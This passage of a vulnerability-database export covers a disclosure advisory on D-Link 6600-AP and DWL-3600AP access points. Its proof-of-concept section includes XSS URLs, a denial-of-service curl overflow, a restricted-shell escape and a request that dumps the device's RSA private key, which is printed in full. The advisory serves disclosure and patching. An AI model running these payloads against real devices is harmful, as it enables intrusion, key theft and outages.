(default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14335"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.3
},
{
"db": "NVD",
"id": "CVE-2019-14335",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29142",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146271",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-14335",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"id": "VAR-201908-0913",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
}
],
"trust": 1.3903846
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
}
]
},
"last_update_date": "2024-11-23T21:52:00.625000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.dlink.com/en/consumer"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP Local Denial of Service Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177605"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95745"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-287",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 2.6,
"url": "https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14335"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"date": "2019-08-08T00:00:00",
"db": "VULHUB",
"id": "VHN-146271"
},
{
"date": "2019-08-08T00:00:00",
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"date": "2019-08-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"date": "2019-08-08T14:15:11.757000",
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-146271"
},
{
"date": "2021-04-23T00:00:00",
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"date": "2019-08-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"date": "2024-11-21T04:26:32.040000",
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
}
],
"trust": 0.6
}
}
VAR-201908-0916
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authentication admin.cgi?action= XSS vulnerability on the management interface. D-Link 6600-AP and DWL-3600AP The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. A buffer overflow vulnerability exists in the D-Link 6600-AP and DWL-3600AP. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. The vulnerability stems from the lack of correct validation of client data in WEB applications. # Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=alert(document.cookie)
Example 2: http://10.90.90.91/admin.cgi?action=+guestalert('Pwned')
2. Post-authenticated Certificate and RSA Private Key extraction
through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE-----
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0916",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap ax devices",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "4.2.0.1421/03/2019"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14338",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2019-14338",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-29147",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-146274",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2019-14338",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-14338",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
